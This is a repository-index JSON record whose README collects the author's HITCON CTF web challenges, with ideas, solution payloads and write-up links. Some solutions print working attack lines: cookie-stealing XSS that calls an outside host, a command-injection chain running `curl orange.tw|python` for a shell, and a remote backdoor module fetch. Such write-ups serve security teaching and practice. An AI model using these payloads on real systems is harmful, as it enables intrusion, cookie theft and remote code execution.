{"id":13538487,"url":"https://github.com/orangetw/my-ctf-web-challenges","last_synced_at":"2025-04-14T05:18:57.848Z","repository":{"id":47606812,"uuid":"70726575","full_name":"orangetw/My-CTF-Web-Challenges","owner":"orangetw","description":"Collection of CTF Web challenges I made","archived":false,"fork":false,"pushed_at":"2023-11-08T09:07:46.000Z","size":61923,"stargazers_count":2719,"open_issues_count":4,"forks_count":480,"subscribers_count":139,"default_branch":"master","last_synced_at":"2025-04-14T05:18:48.929Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/orangetw.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-10-12T17:57:17.000Z","updated_at":"2025-04-11T14:33:53.000Z","dependencies_parsed_at":"2024-08-01T09:37:37.081Z","dependency_job_id":null,"html_url":"https://github.com/orangetw/My-CTF-Web-Challenges","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orangetw%2FMy-CTF-Web-Challenges","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orangetw%2FMy-CTF-Web-Challenges/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orangetw%2FMy-CTF-Web-Challenges/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orangetw%2FMy-CTF-Web-Challenges/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/orangetw","download_url":"https://codeload.github.com/orangetw/My-CTF-Web-Challenges/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248824693,"owners_count":21167345,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:12.625Z","updated_at":"2025-04-14T05:18:57.822Z","avatar_url":"https://github.com/orangetw.png","language":"PHP","funding_links":[],"categories":["\u003ca id=\"c7f35432806520669b15a28161a4d26a\"\u003e\u003c/a\u003eCTF\u0026\u0026HTB","\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集"],"sub_categories":["\u003ca id=\"30c4df38bcd1abaaaac13ffda7d206c6\"\u003e\u003c/a\u003e收集"],"readme":"\n# My CTF Web Challenges\n\nThis is the repository of all CTF challenges I made, including the source code, write-up and idea explanation!\nHope you like it :)  \n\n\n**P.s.** BTW, the `Babyfirst` series and `One Line PHP Challenge` are my favorite challenges. If you haven't enough time, please look them at least!\n\n* [Babyfirst](#babyfirst)  \n* [Babyfirst Revenge](#babyfirst-revenge)  \n* [Babyfirst Revenge v2](#babyfirst-revenge-v2)  \n* [One Line PHP Challenge](#one-line-php-challenge)  \n\n\u003cbr\u003e\n\nAnd you can find me via:  \n* Email: orange@chroot.org   \n* Blog: [http://blog.orange.tw](http://blog.orange.tw/)   \n* Twitter: [@orange_8361](https://twitter.com/orange_8361)  \n\n\u003cbr\u003e\n\n\n## **Table of Content**\n\n* [HITCON 2021](#W3rmup-PHP)\n    * [W3rmup PHP](#W3rmup-PHP)\n    * [One-Bit Man](#One-Bit-Man)\n    * [Metamon Verse](#Metamon-Verse)\n    * [FBI Warning](#FBI-Warning)\n    * [Vulpixelize](#Vulpixelize)\n\n* [HITCON 2020](#oShell)\n    * [oShell](#oShell)\n    * [oStyle](#oStyle)\n    * [Return of Use-After-Flee](#return-of-use-after-flee)\n\n* [HITCON 2019 Quals](#virtual-public-network)\n    * [Virtual Public Network](#virtual-public-network)\n    * [Bounty Pl33z](#bounty-pl33z)\n    * [GoGo PowerSQL](#gogo-powersql)\n    * [Luatic](#luatic)\n    * [Buggy .Net](#buggy-net)  \n\n* [HITCON 2018](#one-line-php-challenge)\n    * [One Line PHP Challenge](#one-line-php-challenge)\n    * [Baby Cake](#baby-cake)\n    * [Oh My Raddit](#oh-my-raddit)\n    * [Oh My Raddit v2](#oh-my-raddit-v2)\n    * [Why so Serials?](#why-so-serials)  \n\n* [HITCON 2017 Quals](#babyfirst-revenge)\n    * [BabyFirst Revenge](#babyfirst-revenge)\n    * [BabyFirst Revenge v2](#babyfirst-revenge-v2)\n    * [SSRFme?](#ssrfme)\n    * [SQL so Hard](#sql-so-hard)\n    * [Baby^H Master PHP 2017](#babyh-master-php-2017)  \n\n* [HITCON 2016 Quals](#papapa)\n    * [%%%](#papapa)\n    * [Leaking](#leaking)\n    * [BabyTrick](#babytrick)\n    * [Angry Boy](#angry-boy)\n    * [Angry Seam](#angry-seam)  \n    \n* [HITCON 2015 Quals](#babyfirst)  \n    * [Babyfirst](#babyfirst)\n    * [nanana](#nanana)\n    * [Giraffe's Coffee](#giraffes-coffee)\n    * [lalala](#lalala)\n    * [Use-After-FLEE](#use-after-flee)\n    \n* [HITCON 2014 Quals](#pushincat)\n    * [PUSHIN CAT](#pushincat)\n    * [PY4H4SHER](#py4h4sher)\n    * [LEENODE](#leenode)\n    \n* [WCTF 2016](#blackbox)  \n    * [BlackBox](#blackbox)\n\n* [AIS3 Final 2015 Final](#sqlpwn)\n    * [SQLPWN](#sqlpwn)\n    \n\u003cbr\u003e\n\n## **W3rmup PHP**\n  \nDifficulty: **★★**  \nSolved: **22 / 666**  \nTag:   **PHP**, **Code Review**, **YAML** ,**Command Injection**  \n\n#### Source Code\n\n* [Source](hitcon-ctf-2021/W3rmup-PHP/)  \n\n#### Idea\n\n* [The Norway Problem](https://hitchdev.com/strictyaml/why/implicit-typing-removed/), the country code of Norway (NO) becomes `False` in YAML\n* Bypass the `escapeshellarg` by the logic problem of `count()` + `unset()`  \n\n#### Solution\n\n* TBD\n\n#### Write Ups\n\n* TBD\n\n\n## **One-Bit Man**\n  \nDifficulty: **★**  \nSolved: **49 / 666**  \nTag:   **PHP**, **Code Review**\n\n#### Source Code\n\n* [Source](hitcon-ctf-2021/One-Bit-Man/)  \n\n#### Idea\n\nYou can flip 1-bit on any file of the latest version of WordPress and you have to pwn the server.\n\n#### Solution\n\nFlip the position `5389` of the file `/var/www/html/wp-includes/user.php` to NOP the NOT (`!`) operation.\n\n```php\n    if ( ! wp_check_password( $password, $user-\u003euser_pass, $user-\u003eID ) ) {\n            return new WP_Error(\n```\n\n#### Write Ups\n\n* TBD\n\n\n\n## **Metamon Verse**\n  \nDifficulty: **★★★☆**  \nSolved: **9 / 666**  \nTag:   **NFS**, **SSRF** ,**RCE**  \n\n#### Source Code\n\n* [Source](hitcon-ctf-2021/Metamon-Verse/)  \n\n#### Idea\n\nThe idea is using the SSRF to communicate with the local NFS/RPC server to get the RCE. To complete the exploit, you have to:\n\n1. Construct the `RPC/PORTMAP_CALL` packet and send to `gopher://127.0.0.1:111/` to get the port of `mountd` service.\n2. Construct the `RPC/MNT_CALL` packet and send to `gopher://127.0.0.1:\u003cmnt-port\u003e/` to get the file-handler of `/data` volume (remember to specify `CURLOPT_LOCALPORT` to bypass the authentication)\n3. Construct the `RPC/NFS_CALL` packet and send to `gopher://127.0.0.1:2049/` to create a SYMLINK (remember to specify `CURLOPT_LOCALPORT` to bypass the authentication)\n4. Symlink the `/app/templates/index.html` to a controllable file to get a SSTI and get the RCE!\n\n#### Solution\n\nAn dirty exploit code can be found [here](https://gist.github.com/orangetw/6d34ff98a6332bc0523b35ea952a790d)\n\n#### Write Ups\n\n* TBD\n\n\n## **FBI Warning**\n  \nDifficulty: **☆**  \nSolved: **25 / 666**  \nTag:   **MISC**, **OSINT** ,**PHP**, **Code Review**\n\n#### Source Code\n\n* [Source](hitcon-ctf-2021/FBI-Warning/)  \n\n#### Idea\n\nThe website uses a famous Message Board project [futaba-ng](https://github.com/futoase/futaba-ng), and the ID generation is based on `REMOTE_ADDR`:\n\n```php\ndefine(\"IDSEED\", 'idの種');       //idの種\n...\n$now.=\" ID:\".substr(crypt(md5($_SERVER[\"REMOTE_ADDR\"].IDSEED.gmdate(\"Ymd\", $time+9*60*60)),'id'),-8);\n```\n\n#### Solution\n\nBecause of the known IP prefix, you can identify the IP address of Ωrange by brute-force easily.\n\n```php\nvar_dump( substr(crypt(md5(\"219.91.64.47\".\"idの種\".\"20211203\"),\"id\"),-8) == \"ueyUrcwA\" )\n// bool(true)\n```\n\n#### Write Ups\n\n* TBD\n\n\n\n## **Vulpixelize**\n  \nDifficulty: **★☆**  \nSolved: **41 / 666**  \nTag:   **Browser**, **Feature**\n\n#### Source Code\n\n* [Source](hitcon-ctf-2021/Vulpixelize/)\n\n#### Idea\n\nUse the Chrome new feature [Text Fragments](https://wicg.github.io/scroll-to-text-fragment/) to extract the flag.\n\n\n#### Solution\n\n* TBD\n\n#### Write Ups\n\n* TBD\n\n\n\n\n\n## **oShell**\n  \nDifficulty: **★★**  \nSolved: **21 / 1281**  \nTag:   **BlackBox**, **Shell** ,**Command Injection**  \n\n#### Source Code\n\n* [Source](hitcon-ctf-2020/oShell/)  \n\n#### Solution\n\n1. Leveraging `strace` in `htop` to read enable secret.\n2. Writing `/home/oShell/.toprc` with `tcpdump -w`\n3. Abusing `top` inspect feature to run arbitrary commands\n\n\n#### Write Ups\n\n* [Writeup from team FrenchRoomba](https://github.com/FrenchRoomba/ctf-writeup-HITCON-CTF-2020/tree/master/oShell)  \n\n\n## **oStyle**\n  \nDifficulty: **★★☆**  \nSolved: **10 / 1281**  \nTag:   **XSS**\n\n#### Source Code\n\n* [Source](hitcon-ctf-2020/oStyle/)  \n\n#### Solution\n\n* The default Apache installation enabled `mod_negotiation`, which allows `.var` mapping and you can specify arbitrary content-type there.\n\n**test.var**\n```\nContent-language: en\nContent-type: text/html\nBody:----foo----\n\n\u003cscript\u003e\nfetch('http://orange.tw/?' + escape(document.cookie))\n\u003c/script\u003e\n\n----foo----\n\n```\n\n\n#### Write Ups\n\n* TBD\n\n\n## **Return of Use-After-Flee**\n  \nDifficulty: **★★★★★**  \nSolved: **0 / 1281**  \nTag: **WhiteBox**, **PHP**, **UAF**, **PWN**  \n\n#### Source Code\n\n* [Source](hitcon-ctf-2020/Return-of-Use-After-Flee/)  \n\n#### Solution\n\n* Exploiting `CVE-2015-0273` to pop the shell without known binaries. More detail will be published in [my blog](http://blog.orange.tw/) soon.\n\n\n#### Write Ups\n\n* TBD\n\n\n\n## **Virtual Public Network**\n  \nDifficulty: **★☆**  \nSolved: **81 / 1147**  \nTag:   **WhiteBox**, **Perl**, **Command Injection**  \n\n#### Source Code\n\n* [Source](hitcon-ctf-2019/virtual-public-network/)  \n\n#### Solution\n\n* Refer my blog and Black Hat 2019 USA slides for details \n    * [Attacking SSL VPN - Part 3: The Golden Pulse Secure SSL VPN RCE Chain, with Twitter as Case Study!](https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html)\n    * [Infiltrating Corporate Intranet Like NSA: Pre-auth RCE on Leading SSL VPNs](https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf)  \n\n```\nhttp://13.231.137.9/cgi-bin/diag.cgi\n?options=-r@a=\"ls -alh /\",system@a%23 2\u003etmp/orange.thtml \u003c\n\u0026tpl=orange\n```\n\n\n#### Write Ups\n\n* TBD\n\n\n## **Bounty Pl33z**\n  \nDifficulty: **★★★☆**  \nSolved: **30 / 1147**  \nTag:   **XSS**\n\n#### Source Code\n\n* [Website](hitcon-ctf-2019/bounty-pl33z/www/)  \n* [XSS bot](hitcon-ctf-2019/bounty-pl33z/bot/)  \n\n#### Solution\n\n* Idea from [@FD](https://twitter.com/filedescriptor) - A little known JavaScript comment style [SingleLineHTMLOpenComment](https://www.ecma-international.org/ecma-262/10.0/index.html#prod-annexB-SingleLineHTMLOpenComment) and [HTMLCloseComment](https://www.ecma-international.org/ecma-262/10.0/index.html#prod-annexB-HTMLCloseComment) in EMCA specification. \n\nHere we use unicode `U+2028` and `U+3002` to bypass `\\n` and `.` filters.\n\n```\nhttp://3.114.5.202/fd.php\n?q=ssl。orange。tw?xx\"%2bdocument[`cookie`]%E2%80%A8--\u003e\n```\n\n#### Unintended Solution\n\n* Nesting template expression\n\n```\nhttp://3.114.5.202/fd.php\n?q=ssl。orange。tw?`%2b\"%2bdocument[`cookie`];(`${`\n```\n\n#### Write Ups\n\n* TBD\n\n## **GoGo PowerSQL**\n  \nDifficulty: **★★★☆**  \nSolved: **16 / 1147**  \nTag:   **Environment Injection**, **MySQL Client Attack**\n\n#### Source Code\n\n* [Docker](hitcon-ctf-2019/gogo-powersql/)  \n\n#### Solution\n\n1. Buffer Overflow the `DB_HOST` in BSS\n2. Due to the [patch](hitcon-ctf-2019/gogo-powersql/Dockerfile#L20), we can pollute environment variable which are not in the [Blacklist](https://github.com/embedthis/goahead/blob/v4.0.0/src/cgi.c#L170).\n3. Hijack MySQL connection by ENV such as `LOCALDOMAIN` or `HOSTALIAES`\n4. Read `/FLAG` by `LOAD DATA LOCAL INFILE`.\n\n```python\nimport requests\n\npayload = ['x=x' for x in range(254)]\npayload.append('name=x')\npayload.append('HOSTALIASES=/proc/self/fd/0')\npayload.append('orangeeeee=go')\npayload = '\u0026'.join(payload)\n\ndata = 'orangeeeee my.orange.tw'\n\nr = requests.post('http://13.231.38.172/cgi-bin/query?'+payload, data=data)\nprint r.content\n```\n\n```shell\n$ git clone https://github.com/lcark/MysqlClientAttack.git\n$ cd MysqlClientAttack\n$ python main.py -F /FLAG\n```\n\n\n\n#### Write Ups\n\n* TBD\n\n## **Luatic**\n  \nDifficulty: **★★☆**  \nSolved: **42 / 1147**  \nTag:   **WhiteBox**, **Redis**, **Lua**\n\n#### Source Code\n\n* [Docker](hitcon-ctf-2019/luatic/)  \n\n#### Solution\n\n1. Override PHP global variables.\n2. Redis [implements](https://github.com/antirez/redis/blob/ee1cef189fff604f165b2d20a307545840de944e/src/scripting.c#L1363) `eval` command by string concatenations so that we can escape the original Lua function to override global objects.\n\n```\nhttp://54.250.242.183/luatic.php\n?_POST[TEST_KEY]=return 1 end function math:random() return 2\n\u0026_POST[TEST_VALUE]=0\n\u0026_POST[MY_SET_COMMAND]=eval\n\u0026_POST[token]=\u003ctoken\u003e\n\u0026_POST[guess]=2\n```\n\n```\nhttp://54.250.242.183/luatic.php\n?_POST[token]=\u003ctoken\u003e\n\u0026_POST[guess]=2\n```\n\n#### Unintended Solution\n\n* Lua is so magic that there are several unintended solutions. Sorry for the imperfect challenge :(\n\n#### Write Ups\n\n* TBD\n\n## **Buggy .Net**\n  \nDifficulty: **★☆**  \nSolved: **13 / 1147**  \nTag:   **ASP.NET**, **WhiteBox**\n\n#### Source Code\n\n* [Default.aspx](hitcon-ctf-2019/buggy-net/Default.aspx)  \n\n#### Solution\n\n* Using .NET request validation to trigger the exception and bypass the filter\n* Idea from [Soroush Dalili](https://twitter.com/irsdl)'s  [WAF Bypass Techniques - Using HTTP Standard and Web Servers' Behaviour](https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour) in AppSec Europe 2018(p30~p34)  \n\n```\nGET / HTTP/1.1\nHost: buggy\nContent-Type: application/x-www-form-urlencoded; charset=ibm500\nContent-Length: 61\n\n%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3\u0026x=L%A7n\n```\n\n```python\nfrom urllib import quote\n\ns = lambda x: quote(x.encode('ibm500'))\nprint '%s=%s\u0026x=%s' % (s('filename'), s('../../FLAG.txt', s('\u003cx\u003e'))\n```\n\n#### Write Ups\n\n* TBD\n\n\n## **One Line PHP Challenge**\n  \nDifficulty: **★★★★**  \nSolved: **3 / 1816**  \nTag:   **PHP**\n\n#### Source Code\n\n* [index.php](hitcon-ctf-2018/one-line-php-challenge/src/index.php)  \n\n#### Solution\n\nP.S. This is a default installation PHP7.2 + Apache on Ubuntu 18.04\n\n1. Control partial session file content by `PHP_SESSION_UPLOAD_PROGRESS`\n2. Bypass `session.upload_progress.cleanup = On` by `race condition` or `slow query`\n3. Control the prefix to `@\u003c?php` by chaining PHP wrappers\n\n* [exp_for_php.py](hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py)\n* [Offical writeup for One Line PHP Challenge](http://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html)  \n\n#### Write Ups\n\n* [(English)One Line PHP Challenge](https://hackmd.io/s/B1A2JIjjm)  \n* [(中文)One Line PHP Challenge](https://hackmd.io/s/SkxOwAqiQ)  \n* [hitcon2018 One Line PHP Challenge](https://www.kingkk.com/2018/10/hitcon2018-One-Line-PHP-Challenge/)  \n* [hitcon 2018受虐笔记一:one-line-php-challenge 学习](http://wonderkun.cc/index.html/?p=718)  \n\n## **Baby Cake**\n  \nDifficulty: **★★★**  \nSolved: **4 / 1816**  \nTag:   **Code Review**, **PHP**, **De-serialization**\n\n#### Source Code\n\n* [index.php](hitcon-ctf-2018/baby-cake/baby_cake.tgz)  \n\n#### Solution\n\nDue to the implement of **`CURLOPT_SAFE_UPLOAD`** in CakePHP `FormData.php`. We can read arbitrary files!\n\n```sh\n# arbitrary file read, listen port 12345 on your server\nhttp://13.230.134.135/\n?url=http://your_ip:12345/\n\u0026data[x]=@/etc/passwd\n\n# arbitrary de-serialization the Monolog POP chain\nhttp://13.230.134.135/\n?url=http://your_ip:12345/\n\u0026data[x]=@phar://../tmp/cache/mycache/[you_ip]/[md5_of_url]/body.cache\n```\n\n* [exploit.phar](hitcon-ctf-2018/baby-cake/exploit.phar)\n\n#### Write Ups\n\n* [Baby Cake](https://github.com/PDKT-Team/ctf/tree/master/hitcon2018/baby-cake)  \n* [Hitcon 2018 Web - Oh My Raddit / Baby Cake 题解](https://xz.aliyun.com/t/2961)  \n* [HITCON CTF 2018 Web WP 之 Baby Cake](https://xz.aliyun.com/t/3035)  \n\n## **Oh My Raddit**\n  \nDifficulty: **★★☆**  \nSolved: **27 / 1816**  \nTag:   **Observation**, **DES checksum**, **Crypto**, **Web**\n\n#### Source Code\n\n* [app](hitcon-ctf-2018/oh-my-raddit/src/)  \n\n#### Solution\n\n1. Know `ECB` mode from block frequency analysis\n2. Know `block size = 8` from cipher length\n3. From the information above, it's reasonable to use `DES` in real world\n4. The most common block is `3ca92540eb2d0a42`(always in the cipher end). We can guess it's the padding `\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08`\n5. Due to the checking parity in [DES](https://en.wikipedia.org/wiki/Data_Encryption_Standard), we can reduce the keyspace from 26(`abcdefghijklmnopqrstuvwxyz`) to 13(`acegikmoqsuwy`)\n    * Break in 1 second with `HashCat`\n    * Break in 10 minutes with single thread Python\n\n#### Write Ups\n\n* [Oh My Raddit](https://github.com/pwning/public-writeup/blob/e818115a2c3a5d18e8191d37b5c3151823d43126/hitcon2018/oh-my-raddit/README.md)  \n* [Oh my raddit](https://github.com/mdsnins/ctf-writeups/blob/b292621463b156d864bd2db062f31afe9aacb8d6/HITCON%202018/Oh%20my%20raddit.md)\n* [2018HITCON-Oh My Raddit\u0026v2题解](https://mochazz.github.io/2018/10/25/2018HITCON-Oh%20My%20Raddit\u0026v2%E9%A2%98%E8%A7%A3/)  \n\n## **Oh My Raddit v2**\n  \nDifficulty: **★★**  \nSolved: **10 / 1816**  \nTag:   **Web.py**,  **SQL Injection to RCE**\n\n#### Source Code\n\n* [app](hitcon-ctf-2018/oh-my-raddit/src/)  \n\n#### Solution\n\n* Read the package version from `requirements.txt`\n* [Remote Code Execution in Web.py framework](https://securityetalii.es/2014/11/08/remote-code-execution-in-web-py-framework/)\n\n* [exp.py](hitcon-ctf-2018/oh-my-raddit/exp.py)\n\n#### Write Ups\n\n* [Oh My Raddit V2](https://github.com/pwning/public-writeup/blob/c7273a8bd01710da0f2d9d9a3c8abe473b76bfde/hitcon2018/ohmyradditv2/README.md)\n* [Oh My Raddit v2](https://ctftime.org/writeup/11931)  \n* [2018HITCON-Oh My Raddit\u0026v2题解](https://mochazz.github.io/2018/10/25/2018HITCON-Oh%20My%20Raddit\u0026v2%E9%A2%98%E8%A7%A3/)  \n\n## **Why so Serials?**\n  \nDifficulty: **★★★★**  \nSolved: **1 / 1816**  \nTag:   **De-serialization**, **RCE**, **ASP.NET**, **View State**\n\n#### Source Code\n\n* [Default.aspx](hitcon-ctf-2018/why-so-serials/src/Default.aspx)  \n\n#### Solution\n\n1. Get the `machineKey` in `web.config` by Server-Side-Includes(`.shtml` or `.stm`)\n2. Exploit `ASP.NET` `___VIEWSTATE` by [ysoserial.net](https://github.com/pwntester/ysoserial.net)\n\n#### Write Ups\n\n* [HITCON 2018: Why so Serials? Write-up](https://cyku.tw/ctf-hitcon-2018-why-so-serials/)  \n* [HITCON CTF 2018 - Why so Serials? Writeup](https://xz.aliyun.com/t/3019)  \n\n\n## **BabyFirst Revenge**\n  \nDifficulty: **★☆**  \nSolved: **95 / 1541**  \nTag:  **WhiteBox**, **PHP**, **Command Injection**  \n\n#### Idea\n\n* Command Injection, but only in **5** bytes  \n\n#### Source Code\n\n* [index.php](hitcon-ctf-2017/babyfirst-revenge/index.php)  \n\n#### Solution\n\n```bash\n# generate `ls -t\u003eg` to file \"_\"\nhttp://host/?cmd=\u003els\\\nhttp://host/?cmd=ls\u003e_\nhttp://host/?cmd=\u003e\\ \\\nhttp://host/?cmd=\u003e-t\\\nhttp://host/?cmd=\u003e\\\u003eg\nhttp://host/?cmd=ls\u003e\u003e_\n\n# generate `curl orange.tw|python` to file \"g\"\nhttp://host/?cmd=\u003eon\nhttp://host/?cmd=\u003eth\\\nhttp://host/?cmd=\u003epy\\\nhttp://host/?cmd=\u003e\\|\\\nhttp://host/?cmd=\u003etw\\\nhttp://host/?cmd=\u003ee.\\\nhttp://host/?cmd=\u003eng\\\nhttp://host/?cmd=\u003era\\\nhttp://host/?cmd=\u003eo\\\nhttp://host/?cmd=\u003e\\ \\\nhttp://host/?cmd=\u003erl\\\nhttp://host/?cmd=\u003ecu\\\nhttp://host/?cmd=sh _\n\n# got shell\nhttp://host/?cmd=sh g\n```\n\nYou can check the [exploit.py](hitcon-ctf-2017/babyfirst-revenge/exploit.py) for the detail! And there are also lots of creative solutions, you can check the write ups below.\n\n\n#### Write Ups\n\n* [HITCON CTF 2017-BabyFirst Revenge-writeup](https://chybeta.github.io/2017/11/04/HITCON-CTF-2017-BabyFirst-Revenge-writeup/)  \n* [HITCON CTF 2017-BabyFirst Revenge-writeup (Via curl)](http://www.jianshu.com/p/82788b6949c7)  \n* [HITCON 2017 CTF BabyFirst Revenge](https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/)  \n* [HITCON CTF 2017 - BabyFirst Revenge (172 pts.)](https://kimtruth.github.io/2017/11/06/HITCON-CTF-2017-BabyFirst-Revenge-172-pts/)  \n* [Hitcon CTF 2017 - Baby Revenge](https://theromanxpl0it.github.io/ctf_hitcon2017/babyrevenge/)  \n* [Hitcon CTF 2017 Quals: Baby First Revenge (web 172) (Via xxd)](https://losfuzzys.github.io/writeup/2017/11/06/hitconctf-babyfirstrevenge/)  \n* [HITCON CTF 2017 BabyFirst Revenge \u0026 v2 writeup](https://findneo.github.io/2017/11/HITCON-CTF-2017-Babyfirst-Revenge-series-writeup/)  \n* [BabyFirst-Revenge-HITCOIN-2017-QUALS by @n4p5ter](https://github.com/n4p5ter/BabyFirst-Revenge-HITCOIN-2017-QUALS)  \n\n\n\n## **BabyFirst Revenge v2**\n  \nDifficulty: **★★★★**  \nSolved: **8 / 1541**  \nTag:  **WhiteBox**, **PHP**, **Command Injection**  \n\n#### Idea\n\n* Command Injection, but only in **4** bytes  \n\n#### Source Code\n\n* [index.php](hitcon-ctf-2017/babyfirst-revenge-v2/index.php)  \n\n#### Solution\n\n1. generate `g\u003e ht- sl` to file `v`\n2. reverse file `v` to file `x`\n4. generate `curl orange.tw|python;`\n6. execute `x`, `ls -th \u003eg`\n7. execute `g`\n\nYou can check [exploit.py](hitcon-ctf-2017/babyfirst-revenge-v2/exploit.py) for the detail!\n\n\n#### Write Ups\n\n* [Baby First Revenge v2 (Via vim) by @bennofs](https://github.com/bennofs/docs/blob/master/hitcon-2017/baby-first-revenge2.md)  \n* [\\[python\\] baby-exp.py](https://codegists.com/snippet/python/baby-exppy_beched_python)  \n* [How to solve a CTF challenge for $20 - HITCON 2017 BabyFirst Revenge v2](https://www.eugenekolo.com/blog/hitcon-babyfirst-revenge-v2/)  \n* [HITCON CTF 2017 BabyFirst Revenge \u0026 v2 writeup](https://findneo.github.io/2017/11/HITCON-CTF-2017-Babyfirst-Revenge-series-writeup/)  \n\n\n\n## **SSRFme?**\n  \nDifficulty: **★★☆**  \nSolved: **20 / 1541**  \nTag:  **WhiteBox**, **Perl**, **PATH Pollution**  \n\n#### Idea\n\n* [CVE-2016-1238](https://perl5.git.perl.org/perl.git/commit/cee96d52c39b1e7b36e1c62d38bcd8d86e9a41ab) (But the latest version of Ubuntu 17.04 in AWS is still vulnerable)  \n* Perl lookup current directory in module importing  \n* Perl module [URI/lib/URI.pm#L136](https://github.com/libwww-perl/URI/blob/b7680860f323a0cf3ffe5f6bdb684646e1ecac33/lib/URI.pm#L136) will `eval` if there is a  unknown scheme\n\n#### Source Code\n\n* [index.php](hitcon-ctf-2017/ssrfme/index.php)  \n\n```bash\n$ sudo apt install libwww-perl\n```\n\n#### Solution\n\n```bash\n# write evil URI module to current directory\n$ curl http://host/?filename=URI/orange.pm\u0026url=http://orange.tw/w/backdoor.pl\n\n# eval evil module `orange`\n$ curl http://host/?filename=xxx\u0026url=orange://orange.tw\n```\n\n#### Write Ups\n\n* [Another Solution by @Paul_Axe](https://twitter.com/Paul_Axe/status/927669724439293953)  \n* [HITCON 2017 SSRFme](https://ricterz.me/posts/HITCON%202017%20SSRFme)  \n* [SSRFme by @sorgloomer](https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/ssrfme.md)  \n\n\n\n## **SQL so Hard**\n  \nDifficulty: **★★★**  \nSolved: **10 / 1541**  \nTag:  **WhiteBox**, **MySQL**, **PostgreSQL**, **SQL Injection**, **Code Injection**  \n\n#### Idea\n\n* MySQL `max_allowed_packet` dropped large size SQL sentence  \n* [Node-Postgres - code execution vulnerability](https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability)  \n* Exploit the RCE in SQL `UPDATE` syntax\n\n#### Source Code\n\n* [app.js](hitcon-ctf-2017/sql-so-hard/app.js)  \n\n#### Solution\n\n* [exploit.py](hitcon-ctf-2017/sql-so-hard/exploit.py)  \n\n#### Write Ups\n\n* [SQL so Hard by @sorgloomer](https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/sql-so-hard.md)  \n\n\n## **Baby^H Master PHP 2017**\n  \nDifficulty: **★★★★☆**  \nSolved: **0 / 1541**  \nTag:  **WhiteBox**, **PHP**, **Serialization**, **Apache Prefock**  \n\n#### Idea\n\n* PHP do the de-serialization on `PHAR` parsing\n* PHP assigned a predictable function name `\\x00lambda_%d` to an anonymous function  \n* Break shared VARIABLE state in Apache Pre-fork mode\n\n#### Source Code\n\n* [index.php](hitcon-ctf-2017/baby^h-master-php-2017/index.php)  \n\n#### Solution\n\n```bash\n# get a cookie\n$ curl http://host/ --cookie-jar cookie\n\n# download .phar file from http://orange.tw/avatar.gif\n$ curl -b cookie 'http://host/?m=upload\u0026url=http://orange.tw/'\n\n# force apache to fork new process\n$ python fork.py \u0026\n\n# get flag\n$ curl -b cookie \"http://host/?m=upload\u0026url=phar:///var/www/data/$MD5_IP/\u0026lucky=%00lambda_1\"\n```\n\n* [avatar.gif](hitcon-ctf-2017/baby^h-master-php-2017/avatar.gif)  \n* [fork.py](hitcon-ctf-2017/baby^h-master-php-2017/fork.py)\n\n#### Write Ups\n\n* [По умолчанию Чтение файлов =\u003e unserialize !](https://rdot.org/forum/showthread.php?t=4379)  \n\n\n\n## **papapa**\n  \nDifficulty: **★**  \nSolved: **71 / 1024**  \nTag:  **BlackBox**, **SSL**, **Pentesting**  \n\n#### Idea\n\n* Leak the internal hostname from SSL certificate  \n\n#### Source Code\n\n* [here](hitcon-ctf-2016/papapa)  \n\n#### Solution\n\n```bash\n$ openssl s_client -showcerts -connect 1.2.3.4:443 \u003c /dev/null | openssl x509 -text | grep -A 1 \"Subject Alternativer Name\"\n...\ndepth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = orange@chroot.org\n...\n# get flag\n$ curl -k  -H \"host: very-secret-area-for-ctf.orange.tw\" https://1.2.3.4/\n```\n\n#### Write Ups\n\n* [HITCON 2016](https://dinhbaoluciusteam.wordpress.com/2016/10/10/hitcon-2016/)  \n* [HITCON CTF 2016: %%% (Web) Write-up](http://icheernoom.blogspot.tw/2016/10/hitcon-ctf-2016-web-write-up.html)  \n* [\\[HITCON 2016\\] \\[WEB 100 - %%%\\] WRITE UP](https://0x90r00t.com/2016/10/10/hitcon-2016-web-100-write-up/)  \n* [hitcon2016 web writeup](http://lorexxar.cn/2016/10/10/hitcon2016/)  \n\n\n\n## 